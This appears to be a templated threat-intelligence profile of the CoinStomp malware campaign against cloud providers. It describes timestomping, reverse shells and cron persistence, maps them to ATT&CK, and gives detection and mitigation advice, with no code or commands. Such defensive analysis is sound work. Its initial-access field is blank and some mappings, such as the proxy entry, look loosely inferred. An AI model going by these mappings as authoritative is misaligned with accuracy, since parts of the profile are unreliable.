Full Report
On 2022-02-02, a campaign was reported, involving CoinStomp operator, gaining initial access via , while using Timestomping, Reverse shell, Cron persistence,. The following tools were observed: CoinStomp.
Analysis Summary
# Tool/Technique: CoinStomp
## Overview
CoinStomp is identified as a piece of malware used by the "CoinStomp operator" in a campaign targeting cloud service providers, primarily in Asia. It facilitates unauthorized access and persistence on compromised systems.
## Technical Details
- Type: Malware family
- Platform: Not explicitly stated, but context suggests Linux/Cloud environments given persistence via Cron.
- Capabilities: Establishing persistence, likely achieving remote execution (via Reverse Shell).
- First Seen: February 2, 2022 (Date of campaign report)
## MITRE ATT&CK Mapping
The article explicitly mentions the observed techniques used in conjunction with this campaign:
- **TA0003 - Persistence**
- T1053.003 - Scheduled Task/Job: Cron
- **TA0011 - Command and Control**
- T1090 - Proxy
- *Note: The 'Reverse shell' technique maps generally to C2 or Execution.*
- **TA0004 - Privilege Escalation / TA0002 - Execution**
- Techniques related to achieving the shell execution are implied.
## Functionality
### Core Capabilities
- **Reverse Shell:** Establishing an outbound connection back to the attacker for interactive command execution.
- **Persistence:** Utilizing **Cron persistence** to ensure the malware or subsequent access mechanisms survive system reboots.
### Advanced Features
- **Timestomping:** Modifying timestamps of files to evade detection and obscure forensic timelines.
## Indicators of Compromise
- File Hashes: N/A
- File Names: N/A
- Registry Keys: N/A
- Network Indicators: N/A (Specific C2 infrastructure not detailed in the context)
- Behavioral Indicators: Observed use of Cron jobs for persistence, execution of reverse shells, and file timestamp manipulation (Timestomping).
## Associated Threat Actors
- 🪙CoinStomp operator
## Detection Methods
- **Signature-based detection:** Signatures for the CoinStomp binary itself (if available).
- **Behavioral detection:** Monitoring for the creation of suspicious Cron jobs, unexpected outbound network connections (reverse shells), and instances of file `utimensat()` or equivalent system calls used for timestamp modification.
## Mitigation Strategies
- **Prevention measures:** Restricting execution privileges in cloud environments, implementing strong egress filtering to block unknown outbound connections.
- **Hardening recommendations:** Regularly auditing `/etc/cron*` and user crontabs for unauthorized entries; utilizing system integrity monitoring tools.
## Related Tools/Techniques
- Reverse Shell (General technique)
- Cron persistence (Specific persistence mechanism)
- Timestomping (Forensic evasion technique)